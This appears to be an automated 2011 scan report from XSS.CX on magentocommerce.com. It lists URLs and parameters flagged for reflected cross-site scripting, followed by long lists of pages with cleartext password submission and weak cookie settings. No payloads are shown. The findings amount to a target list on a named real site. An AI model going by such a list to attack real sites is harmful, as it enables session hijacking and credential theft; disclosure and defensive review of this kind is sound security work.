XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, magentocommerce.com

Report generated by XSS.CX at Fri Aug 12 09:20:15 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://www.magentocommerce.com/answers/ [name of an arbitrarily supplied request parameter]

1.2. http://www.magentocommerce.com/boards/viewforum/10252/ [REST URL parameter 3]

1.3. http://www.magentocommerce.com/media/screencasts/adding-related-products/view [REST URL parameter 3]

1.4. http://www.magentocommerce.com/media/screencasts/adding-related-products/view [name of an arbitrarily supplied request parameter]

1.5. http://www.magentocommerce.com/media/screencasts/community-groups/view [REST URL parameter 3]

1.6. http://www.magentocommerce.com/media/screencasts/community-groups/view [name of an arbitrarily supplied request parameter]

1.7. http://www.magentocommerce.com/media/screencasts/configurable-products/view [REST URL parameter 3]

1.8. http://www.magentocommerce.com/media/screencasts/configurable-products/view [name of an arbitrarily supplied request parameter]

1.9. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view [REST URL parameter 3]

1.10. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view [name of an arbitrarily supplied request parameter]

1.11. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view [REST URL parameter 3]

1.12. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view [name of an arbitrarily supplied request parameter]

1.13. http://www.magentocommerce.com/media/screencasts/currency/view [REST URL parameter 3]

1.14. http://www.magentocommerce.com/media/screencasts/currency/view [name of an arbitrarily supplied request parameter]

1.15. http://www.magentocommerce.com/media/screencasts/data-exporting/view [REST URL parameter 3]

1.16. http://www.magentocommerce.com/media/screencasts/data-exporting/view [name of an arbitrarily supplied request parameter]

1.17. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view [REST URL parameter 3]

1.18. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view [name of an arbitrarily supplied request parameter]

1.19. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view [REST URL parameter 3]

1.20. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view [name of an arbitrarily supplied request parameter]

1.21. http://www.magentocommerce.com/media/screencasts/grouped-products/view [REST URL parameter 3]

1.22. http://www.magentocommerce.com/media/screencasts/grouped-products/view [name of an arbitrarily supplied request parameter]

1.23. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view [REST URL parameter 3]

1.24. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view [name of an arbitrarily supplied request parameter]

1.25. http://www.magentocommerce.com/media/screencasts/landing-pages/view [REST URL parameter 3]

1.26. http://www.magentocommerce.com/media/screencasts/landing-pages/view [name of an arbitrarily supplied request parameter]

1.27. http://www.magentocommerce.com/media/screencasts/permissions/view [REST URL parameter 3]

1.28. http://www.magentocommerce.com/media/screencasts/permissions/view [name of an arbitrarily supplied request parameter]

1.29. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view [REST URL parameter 3]

1.30. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view [name of an arbitrarily supplied request parameter]

1.31. http://www.magentocommerce.com/media/screencasts/product-comparison/view [REST URL parameter 3]

1.32. http://www.magentocommerce.com/media/screencasts/product-comparison/view [name of an arbitrarily supplied request parameter]

1.33. http://www.magentocommerce.com/media/screencasts/search/view [REST URL parameter 3]

1.34. http://www.magentocommerce.com/media/screencasts/search/view [name of an arbitrarily supplied request parameter]

1.35. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view [REST URL parameter 3]

1.36. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view [name of an arbitrarily supplied request parameter]

1.37. http://www.magentocommerce.com/media/screencasts/static-blocks/view [REST URL parameter 3]

1.38. http://www.magentocommerce.com/media/screencasts/static-blocks/view [name of an arbitrarily supplied request parameter]

1.39. http://www.magentocommerce.com/media/screencasts/transactional-email/view [REST URL parameter 3]

1.40. http://www.magentocommerce.com/media/screencasts/transactional-email/view [name of an arbitrarily supplied request parameter]

1.41. http://www.magentocommerce.com/media/screencasts/upsells/view [REST URL parameter 3]

1.42. http://www.magentocommerce.com/media/screencasts/upsells/view [name of an arbitrarily supplied request parameter]

1.43. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view [REST URL parameter 3]

1.44. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view [name of an arbitrarily supplied request parameter]

1.45. http://www.magentocommerce.com/products/checkout/cart/ [REST URL parameter 2]

1.46. http://www.magentocommerce.com/products/checkout/cart/ [REST URL parameter 3]

1.47. http://www.magentocommerce.com/products/checkout/cart/ [name of an arbitrarily supplied request parameter]

1.48. http://www.magentocommerce.com/products/customer/account/create/ [REST URL parameter 2]

1.49. http://www.magentocommerce.com/products/customer/account/forgotpassword/ [REST URL parameter 2]

1.50. http://www.magentocommerce.com/products/customer/account/loginPost/ [REST URL parameter 2]

1.51. http://www.magentocommerce.com/products/ee/sso/logout [REST URL parameter 2]

1.52. http://www.magentocommerce.com/products/job-post.html [REST URL parameter 2]

1.53. http://www.magentocommerce.com/products/job-post.html [name of an arbitrarily supplied request parameter]

1.54. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/favicon.ico [REST URL parameter 2]

2. Cleartext submission of password

2.1. http://www.magentocommerce.com/

2.2. http://www.magentocommerce.com/!!!--

2.3. http://www.magentocommerce.com/answers/

2.4. http://www.magentocommerce.com/blog

2.5. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

2.6. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

2.7. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

2.8. http://www.magentocommerce.com/boards/

2.9. http://www.magentocommerce.com/boards/viewforum/10252/

2.10. http://www.magentocommerce.com/boards/viewthread/1647/

2.11. http://www.magentocommerce.com/bug-tracking

2.12. http://www.magentocommerce.com/casestudies

2.13. http://www.magentocommerce.com/company/

2.14. http://www.magentocommerce.com/company/careers

2.15. http://www.magentocommerce.com/company/contact-us

2.16. http://www.magentocommerce.com/company/contact-us/

2.17. http://www.magentocommerce.com/company/contact-us/thank_you

2.18. http://www.magentocommerce.com/company/events

2.19. http://www.magentocommerce.com/company/events/

2.20. http://www.magentocommerce.com/company/inthepress

2.21. http://www.magentocommerce.com/company/inthepress/

2.22. http://www.magentocommerce.com/company/jobs/

2.23. http://www.magentocommerce.com/company/leadership

2.24. http://www.magentocommerce.com/company/leadership/

2.25. http://www.magentocommerce.com/company/media

2.26. http://www.magentocommerce.com/company/media/

2.27. http://www.magentocommerce.com/company/pci-compliance

2.28. http://www.magentocommerce.com/company/press-releases

2.29. http://www.magentocommerce.com/company/press-releases/

2.30. http://www.magentocommerce.com/company/privacy

2.31. http://www.magentocommerce.com/company/terms

2.32. http://www.magentocommerce.com/de

2.33. http://www.magentocommerce.com/demo

2.34. http://www.magentocommerce.com/design_guide

2.35. http://www.magentocommerce.com/dk

2.36. http://www.magentocommerce.com/download

2.37. http://www.magentocommerce.com/download/diff

2.38. http://www.magentocommerce.com/download/login_form

2.39. http://www.magentocommerce.com/download/release_notes

2.40. http://www.magentocommerce.com/es

2.41. http://www.magentocommerce.com/fr

2.42. http://www.magentocommerce.com/he

2.43. http://www.magentocommerce.com/hu

2.44. http://www.magentocommerce.com/imagine

2.45. http://www.magentocommerce.com/it

2.46. http://www.magentocommerce.com/jobs

2.47. http://www.magentocommerce.com/jobs/

2.48. http://www.magentocommerce.com/jobs/p/2/

2.49. http://www.magentocommerce.com/knowledge-base

2.50. http://www.magentocommerce.com/license/

2.51. http://www.magentocommerce.com/license/enterprise-edition

2.52. http://www.magentocommerce.com/lodger-footwear/

2.53. http://www.magentocommerce.com/lt

2.54. http://www.magentocommerce.com/magento-connect

2.55. http://www.magentocommerce.com/maps/online

2.56. http://www.magentocommerce.com/media/interviews

2.57. http://www.magentocommerce.com/media/interviews/alpedia/view

2.58. http://www.magentocommerce.com/media/interviews/bright-light-media/view

2.59. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view

2.60. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view

2.61. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view

2.62. http://www.magentocommerce.com/media/interviews/lodger-footwear/view

2.63. http://www.magentocommerce.com/media/interviews/man-junk/view

2.64. http://www.magentocommerce.com/media/interviews/nerdyshirts/view

2.65. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

2.66. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view

2.67. http://www.magentocommerce.com/media/interviews/shoebacca/view

2.68. http://www.magentocommerce.com/media/interviews/signing-time/view

2.69. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view

2.70. http://www.magentocommerce.com/media/interviews/timeout-online/view

2.71. http://www.magentocommerce.com/media/interviews/tvonics/view

2.72. http://www.magentocommerce.com/media/interviews/wander/view

2.73. http://www.magentocommerce.com/media/interviews/wearport/view

2.74. http://www.magentocommerce.com/media/interviews/wkf-communications/view

2.75. http://www.magentocommerce.com/media/screencasts

2.76. http://www.magentocommerce.com/media/screencasts/adding-related-products/view

2.77. http://www.magentocommerce.com/media/screencasts/community-groups/view

2.78. http://www.magentocommerce.com/media/screencasts/configurable-products/view

2.79. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view

2.80. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view

2.81. http://www.magentocommerce.com/media/screencasts/currency/view

2.82. http://www.magentocommerce.com/media/screencasts/data-exporting/view

2.83. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view

2.84. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view

2.85. http://www.magentocommerce.com/media/screencasts/grouped-products/view

2.86. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view

2.87. http://www.magentocommerce.com/media/screencasts/landing-pages/view

2.88. http://www.magentocommerce.com/media/screencasts/permissions/view

2.89. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

2.90. http://www.magentocommerce.com/media/screencasts/product-comparison/view

2.91. http://www.magentocommerce.com/media/screencasts/search/view

2.92. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view

2.93. http://www.magentocommerce.com/media/screencasts/static-blocks/view

2.94. http://www.magentocommerce.com/media/screencasts/transactional-email/view

2.95. http://www.magentocommerce.com/media/screencasts/upsells/view

2.96. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view

2.97. http://www.magentocommerce.com/media/screenshots

2.98. http://www.magentocommerce.com/media/videos

2.99. http://www.magentocommerce.com/media/videos/

2.100. http://www.magentocommerce.com/media/webinars

2.101. http://www.magentocommerce.com/media/webinars/

2.102. http://www.magentocommerce.com/partners/

2.103. http://www.magentocommerce.com/partners/find/bronze-solution/

2.104. http://www.magentocommerce.com/partners/find/hosting-partners/

2.105. http://www.magentocommerce.com/partners/find/industry-partners/

2.106. http://www.magentocommerce.com/partners/find/solution-partners/

2.107. http://www.magentocommerce.com/partners/hosting-partners

2.108. http://www.magentocommerce.com/partners/industry-partners

2.109. http://www.magentocommerce.com/partners/solution-partners

2.110. http://www.magentocommerce.com/partners/view/117/gorilla

2.111. http://www.magentocommerce.com/pl

2.112. http://www.magentocommerce.com/product/community-edition

2.113. http://www.magentocommerce.com/product/compare

2.114. http://www.magentocommerce.com/product/deployed-solutions

2.115. http://www.magentocommerce.com/product/emerging-business

2.116. http://www.magentocommerce.com/product/enterprise-community-faqs

2.117. http://www.magentocommerce.com/product/enterprise-edition

2.118. http://www.magentocommerce.com/product/enterprise-level

2.119. http://www.magentocommerce.com/product/faq

2.120. http://www.magentocommerce.com/product/features

2.121. http://www.magentocommerce.com/product/hosted-solutions

2.122. http://www.magentocommerce.com/product/magento-go

2.123. http://www.magentocommerce.com/product/magento-zend

2.124. http://www.magentocommerce.com/product/mobile

2.125. http://www.magentocommerce.com/product/professional-edition

2.126. http://www.magentocommerce.com/pt_BR

2.127. http://www.magentocommerce.com/roadmap/issue-roadmap

2.128. http://www.magentocommerce.com/ru

2.129. http://www.magentocommerce.com/services

2.130. http://www.magentocommerce.com/services/

2.131. http://www.magentocommerce.com/services/course-pricing

2.132. http://www.magentocommerce.com/services/course-schedule

2.133. http://www.magentocommerce.com/services/descriptions

2.134. http://www.magentocommerce.com/services/professional-services

2.135. http://www.magentocommerce.com/services/register-for-training

2.136. http://www.magentocommerce.com/services/testimonials

2.137. http://www.magentocommerce.com/services/training

2.138. http://www.magentocommerce.com/showcase

2.139. http://www.magentocommerce.com/sitemap/

2.140. http://www.magentocommerce.com/support/magento-user-guide-book

2.141. http://www.magentocommerce.com/support/magento_core_api

2.142. http://www.magentocommerce.com/support/overview

2.143. http://www.magentocommerce.com/svn

2.144. http://www.magentocommerce.com/system-requirements

2.145. http://www.magentocommerce.com/translations

2.146. http://www.magentocommerce.com/ua

2.147. http://www.magentocommerce.com/vi

2.148. http://www.magentocommerce.com/virtual/download-magento/

2.149. http://www.magentocommerce.com/virtual/enterprise-register/

2.150. http://www.magentocommerce.com/whitepaper/

3. Cookie scoped to parent domain

3.1. http://www.magentocommerce.com/

3.2. http://www.magentocommerce.com/media/screencasts/configurable-products/view

3.3. http://www.magentocommerce.com/media/screencasts/search/view

3.4. http://www.magentocommerce.com/!!!--

3.5. http://www.magentocommerce.com/answers/

3.6. http://www.magentocommerce.com/blog

3.7. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

3.8. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

3.9. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

3.10. http://www.magentocommerce.com/boards/

3.11. http://www.magentocommerce.com/boards/viewforum/10252/

3.12. http://www.magentocommerce.com/boards/viewthread/1647/

3.13. http://www.magentocommerce.com/bug-tracking

3.14. http://www.magentocommerce.com/casestudies

3.15. http://www.magentocommerce.com/company/

3.16. http://www.magentocommerce.com/company/careers

3.17. http://www.magentocommerce.com/company/contact-us

3.18. http://www.magentocommerce.com/company/contact-us/

3.19. http://www.magentocommerce.com/company/contact-us/thank_you

3.20. http://www.magentocommerce.com/company/events

3.21. http://www.magentocommerce.com/company/events/

3.22. http://www.magentocommerce.com/company/inthepress

3.23. http://www.magentocommerce.com/company/inthepress/

3.24. http://www.magentocommerce.com/company/jobs/

3.25. http://www.magentocommerce.com/company/leadership

3.26. http://www.magentocommerce.com/company/leadership/

3.27. http://www.magentocommerce.com/company/media

3.28. http://www.magentocommerce.com/company/media/

3.29. http://www.magentocommerce.com/company/pci-compliance

3.30. http://www.magentocommerce.com/company/press-releases

3.31. http://www.magentocommerce.com/company/press-releases/

3.32. http://www.magentocommerce.com/company/privacy

3.33. http://www.magentocommerce.com/company/terms

3.34. http://www.magentocommerce.com/de

3.35. http://www.magentocommerce.com/demo

3.36. http://www.magentocommerce.com/design_guide

3.37. http://www.magentocommerce.com/dk

3.38. http://www.magentocommerce.com/download

3.39. http://www.magentocommerce.com/download/diff

3.40. http://www.magentocommerce.com/download/get-started

3.41. http://www.magentocommerce.com/download/login_form

3.42. http://www.magentocommerce.com/download/release_notes

3.43. http://www.magentocommerce.com/es

3.44. http://www.magentocommerce.com/fr

3.45. http://www.magentocommerce.com/he

3.46. http://www.magentocommerce.com/hu

3.47. http://www.magentocommerce.com/imagine

3.48. http://www.magentocommerce.com/it

3.49. http://www.magentocommerce.com/jobs

3.50. http://www.magentocommerce.com/jobs/

3.51. http://www.magentocommerce.com/jobs/p/2/

3.52. http://www.magentocommerce.com/knowledge-base

3.53. http://www.magentocommerce.com/license/

3.54. http://www.magentocommerce.com/license/enterprise-edition

3.55. http://www.magentocommerce.com/lodger-footwear/

3.56. http://www.magentocommerce.com/lt

3.57. http://www.magentocommerce.com/magento-connect

3.58. http://www.magentocommerce.com/maps/online

3.59. http://www.magentocommerce.com/media/interviews

3.60. http://www.magentocommerce.com/media/interviews/alpedia/view

3.61. http://www.magentocommerce.com/media/interviews/bright-light-media/view

3.62. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view

3.63. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view

3.64. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view

3.65. http://www.magentocommerce.com/media/interviews/lodger-footwear/view

3.66. http://www.magentocommerce.com/media/interviews/man-junk/view

3.67. http://www.magentocommerce.com/media/interviews/nerdyshirts/view

3.68. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

3.69. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view

3.70. http://www.magentocommerce.com/media/interviews/shoebacca/view

3.71. http://www.magentocommerce.com/media/interviews/signing-time/view

3.72. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view

3.73. http://www.magentocommerce.com/media/interviews/timeout-online/view

3.74. http://www.magentocommerce.com/media/interviews/tvonics/view

3.75. http://www.magentocommerce.com/media/interviews/wander/view

3.76. http://www.magentocommerce.com/media/interviews/wearport/view

3.77. http://www.magentocommerce.com/media/interviews/wkf-communications/view

3.78. http://www.magentocommerce.com/media/screencasts

3.79. http://www.magentocommerce.com/media/screencasts/adding-related-products/view

3.80. http://www.magentocommerce.com/media/screencasts/community-groups/view

3.81. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view

3.82. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view

3.83. http://www.magentocommerce.com/media/screencasts/currency/view

3.84. http://www.magentocommerce.com/media/screencasts/data-exporting/view

3.85. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view

3.86. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view

3.87. http://www.magentocommerce.com/media/screencasts/grouped-products/view

3.88. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view

3.89. http://www.magentocommerce.com/media/screencasts/landing-pages/view

3.90. http://www.magentocommerce.com/media/screencasts/permissions/view

3.91. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

3.92. http://www.magentocommerce.com/media/screencasts/product-comparison/view

3.93. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view

3.94. http://www.magentocommerce.com/media/screencasts/static-blocks/view

3.95. http://www.magentocommerce.com/media/screencasts/transactional-email/view

3.96. http://www.magentocommerce.com/media/screencasts/upsells/view

3.97. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view

3.98. http://www.magentocommerce.com/media/screenshots

3.99. http://www.magentocommerce.com/media/videos

3.100. http://www.magentocommerce.com/media/videos/

3.101. http://www.magentocommerce.com/media/webinars

3.102. http://www.magentocommerce.com/media/webinars/

3.103. http://www.magentocommerce.com/partners/

3.104. http://www.magentocommerce.com/partners/find/bronze-solution/

3.105. http://www.magentocommerce.com/partners/find/hosting-partners/

3.106. http://www.magentocommerce.com/partners/find/industry-partners/

3.107. http://www.magentocommerce.com/partners/find/solution-partners/

3.108. http://www.magentocommerce.com/partners/hosting-partners

3.109. http://www.magentocommerce.com/partners/industry-partners

3.110. http://www.magentocommerce.com/partners/solution-partners

3.111. http://www.magentocommerce.com/partners/view/117/gorilla

3.112. http://www.magentocommerce.com/pl

3.113. http://www.magentocommerce.com/product/community-edition

3.114. http://www.magentocommerce.com/product/compare

3.115. http://www.magentocommerce.com/product/deployed-solutions

3.116. http://www.magentocommerce.com/product/emerging-business

3.117. http://www.magentocommerce.com/product/enterprise-community-faqs

3.118. http://www.magentocommerce.com/product/enterprise-edition

3.119. http://www.magentocommerce.com/product/enterprise-level

3.120. http://www.magentocommerce.com/product/faq

3.121. http://www.magentocommerce.com/product/features

3.122. http://www.magentocommerce.com/product/hosted-solutions

3.123. http://www.magentocommerce.com/product/magento-go

3.124. http://www.magentocommerce.com/product/magento-zend

3.125. http://www.magentocommerce.com/product/mobile

3.126. http://www.magentocommerce.com/product/professional-edition

3.127. http://www.magentocommerce.com/products/checkout/cart/

3.128. http://www.magentocommerce.com/products/job-post.html

3.129. http://www.magentocommerce.com/pt_BR

3.130. http://www.magentocommerce.com/roadmap

3.131. http://www.magentocommerce.com/roadmap/issue-roadmap

3.132. http://www.magentocommerce.com/ru

3.133. http://www.magentocommerce.com/services

3.134. http://www.magentocommerce.com/services/

3.135. http://www.magentocommerce.com/services/contact-us-popup

3.136. http://www.magentocommerce.com/services/course-pricing

3.137. http://www.magentocommerce.com/services/course-schedule

3.138. http://www.magentocommerce.com/services/descriptions

3.139. http://www.magentocommerce.com/services/professional-services

3.140. http://www.magentocommerce.com/services/register-for-training

3.141. http://www.magentocommerce.com/services/testimonials

3.142. http://www.magentocommerce.com/services/thank-you

3.143. http://www.magentocommerce.com/services/training

3.144. http://www.magentocommerce.com/showcase

3.145. http://www.magentocommerce.com/sitemap/

3.146. http://www.magentocommerce.com/support/magento-user-guide-book

3.147. http://www.magentocommerce.com/support/magento_core_api

3.148. http://www.magentocommerce.com/support/overview

3.149. http://www.magentocommerce.com/svn

3.150. http://www.magentocommerce.com/system-requirements

3.151. http://www.magentocommerce.com/trackback/2509/

3.152. http://www.magentocommerce.com/trackback/2555/

3.153. http://www.magentocommerce.com/trackback/2556/

3.154. http://www.magentocommerce.com/trackback/2557/

3.155. http://www.magentocommerce.com/trackback/2571/

3.156. http://www.magentocommerce.com/trackback/323/

3.157. http://www.magentocommerce.com/trackback/383/

3.158. http://www.magentocommerce.com/trackback/446/

3.159. http://www.magentocommerce.com/trackback/561/

3.160. http://www.magentocommerce.com/trackback/625/

3.161. http://www.magentocommerce.com/trackback/713/

3.162. http://www.magentocommerce.com/trackback/892/

3.163. http://www.magentocommerce.com/translations

3.164. http://www.magentocommerce.com/ua

3.165. http://www.magentocommerce.com/vi

3.166. http://www.magentocommerce.com/virtual/download-magento/

3.167. http://www.magentocommerce.com/virtual/enterprise-register/

3.168. http://www.magentocommerce.com/whitepaper/

3.169. http://www.magentocommerce.com/wiki

4. Cookie without HttpOnly flag set

4.1. http://www.magentocommerce.com/

4.2. http://www.magentocommerce.com/

4.3. http://www.magentocommerce.com/media/screencasts/configurable-products/view

4.4. http://www.magentocommerce.com/media/screencasts/search/view

4.5. http://www.magentocommerce.com/!!!--

4.6. http://www.magentocommerce.com/answers/

4.7. http://www.magentocommerce.com/blog

4.8. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

4.9. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

4.10. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

4.11. http://www.magentocommerce.com/boards/

4.12. http://www.magentocommerce.com/boards/viewforum/10252/

4.13. http://www.magentocommerce.com/boards/viewthread/1647/

4.14. http://www.magentocommerce.com/bug-tracking

4.15. http://www.magentocommerce.com/casestudies

4.16. http://www.magentocommerce.com/company/

4.17. http://www.magentocommerce.com/company/careers

4.18. http://www.magentocommerce.com/company/contact-us

4.19. http://www.magentocommerce.com/company/contact-us/

4.20. http://www.magentocommerce.com/company/contact-us/thank_you

4.21. http://www.magentocommerce.com/company/events

4.22. http://www.magentocommerce.com/company/events/

4.23. http://www.magentocommerce.com/company/inthepress

4.24. http://www.magentocommerce.com/company/inthepress/

4.25. http://www.magentocommerce.com/company/jobs/

4.26. http://www.magentocommerce.com/company/leadership

4.27. http://www.magentocommerce.com/company/leadership/

4.28. http://www.magentocommerce.com/company/media

4.29. http://www.magentocommerce.com/company/media/

4.30. http://www.magentocommerce.com/company/pci-compliance

4.31. http://www.magentocommerce.com/company/press-releases

4.32. http://www.magentocommerce.com/company/press-releases/

4.33. http://www.magentocommerce.com/company/privacy

4.34. http://www.magentocommerce.com/company/terms

4.35. http://www.magentocommerce.com/de

4.36. http://www.magentocommerce.com/demo

4.37. http://www.magentocommerce.com/design_guide

4.38. http://www.magentocommerce.com/dk

4.39. http://www.magentocommerce.com/download

4.40. http://www.magentocommerce.com/download/diff

4.41. http://www.magentocommerce.com/download/get-started

4.42. http://www.magentocommerce.com/download/login_form

4.43. http://www.magentocommerce.com/download/release_notes

4.44. http://www.magentocommerce.com/es

4.45. http://www.magentocommerce.com/fr

4.46. http://www.magentocommerce.com/he

4.47. http://www.magentocommerce.com/hu

4.48. http://www.magentocommerce.com/imagine

4.49. http://www.magentocommerce.com/it

4.50. http://www.magentocommerce.com/jobs

4.51. http://www.magentocommerce.com/jobs/

4.52. http://www.magentocommerce.com/jobs/p/2/

4.53. http://www.magentocommerce.com/knowledge-base

4.54. http://www.magentocommerce.com/license/

4.55. http://www.magentocommerce.com/license/enterprise-edition

4.56. http://www.magentocommerce.com/lodger-footwear/

4.57. http://www.magentocommerce.com/lt

4.58. http://www.magentocommerce.com/magento-connect

4.59. http://www.magentocommerce.com/maps/online

4.60. http://www.magentocommerce.com/media/interviews

4.61. http://www.magentocommerce.com/media/interviews/alpedia/view

4.62. http://www.magentocommerce.com/media/interviews/bright-light-media/view

4.63. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view

4.64. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view

4.65. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view

4.66. http://www.magentocommerce.com/media/interviews/lodger-footwear/view

4.67. http://www.magentocommerce.com/media/interviews/man-junk/view

4.68. http://www.magentocommerce.com/media/interviews/nerdyshirts/view

4.69. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

4.70. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view

4.71. http://www.magentocommerce.com/media/interviews/shoebacca/view

4.72. http://www.magentocommerce.com/media/interviews/signing-time/view

4.73. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view

4.74. http://www.magentocommerce.com/media/interviews/timeout-online/view

4.75. http://www.magentocommerce.com/media/interviews/tvonics/view

4.76. http://www.magentocommerce.com/media/interviews/wander/view

4.77. http://www.magentocommerce.com/media/interviews/wearport/view

4.78. http://www.magentocommerce.com/media/interviews/wkf-communications/view

4.79. http://www.magentocommerce.com/media/screencasts

4.80. http://www.magentocommerce.com/media/screencasts/adding-related-products/view

4.81. http://www.magentocommerce.com/media/screencasts/community-groups/view

4.82. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view

4.83. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view

4.84. http://www.magentocommerce.com/media/screencasts/currency/view

4.85. http://www.magentocommerce.com/media/screencasts/data-exporting/view

4.86. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view

4.87. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view

4.88. http://www.magentocommerce.com/media/screencasts/grouped-products/view

4.89. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view

4.90. http://www.magentocommerce.com/media/screencasts/landing-pages/view

4.91. http://www.magentocommerce.com/media/screencasts/permissions/view

4.92. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

4.93. http://www.magentocommerce.com/media/screencasts/product-comparison/view

4.94. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view

4.95. http://www.magentocommerce.com/media/screencasts/static-blocks/view

4.96. http://www.magentocommerce.com/media/screencasts/transactional-email/view

4.97. http://www.magentocommerce.com/media/screencasts/upsells/view

4.98. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view

4.99. http://www.magentocommerce.com/media/screenshots

4.100. http://www.magentocommerce.com/media/videos

4.101. http://www.magentocommerce.com/media/videos/

4.102. http://www.magentocommerce.com/media/webinars

4.103. http://www.magentocommerce.com/media/webinars/

4.104. http://www.magentocommerce.com/partners/

4.105. http://www.magentocommerce.com/partners/find/bronze-solution/

4.106. http://www.magentocommerce.com/partners/find/hosting-partners/

4.107. http://www.magentocommerce.com/partners/find/industry-partners/

4.108. http://www.magentocommerce.com/partners/find/solution-partners/

4.109. http://www.magentocommerce.com/partners/hosting-partners

4.110. http://www.magentocommerce.com/partners/industry-partners

4.111. http://www.magentocommerce.com/partners/solution-partners

4.112. http://www.magentocommerce.com/partners/view/117/gorilla

4.113. http://www.magentocommerce.com/pl

4.114. http://www.magentocommerce.com/product/community-edition

4.115. http://www.magentocommerce.com/product/compare

4.116. http://www.magentocommerce.com/product/deployed-solutions

4.117. http://www.magentocommerce.com/product/emerging-business

4.118. http://www.magentocommerce.com/product/enterprise-community-faqs

4.119. http://www.magentocommerce.com/product/enterprise-edition

4.120. http://www.magentocommerce.com/product/enterprise-level

4.121. http://www.magentocommerce.com/product/faq

4.122. http://www.magentocommerce.com/product/features

4.123. http://www.magentocommerce.com/product/hosted-solutions

4.124. http://www.magentocommerce.com/product/magento-go

4.125. http://www.magentocommerce.com/product/magento-zend

4.126. http://www.magentocommerce.com/product/mobile

4.127. http://www.magentocommerce.com/product/professional-edition

4.128. http://www.magentocommerce.com/products/checkout/cart/

4.129. http://www.magentocommerce.com/products/job-post.html

4.130. http://www.magentocommerce.com/pt_BR

4.131. http://www.magentocommerce.com/roadmap

4.132. http://www.magentocommerce.com/roadmap/issue-roadmap

4.133. http://www.magentocommerce.com/ru

4.134. http://www.magentocommerce.com/services

4.135. http://www.magentocommerce.com/services/

4.136. http://www.magentocommerce.com/services/contact-us-popup

4.137. http://www.magentocommerce.com/services/course-pricing

4.138. http://www.magentocommerce.com/services/course-schedule

4.139. http://www.magentocommerce.com/services/descriptions

4.140. http://www.magentocommerce.com/services/professional-services

4.141. http://www.magentocommerce.com/services/register-for-training

4.142. http://www.magentocommerce.com/services/testimonials

4.143. http://www.magentocommerce.com/services/thank-you

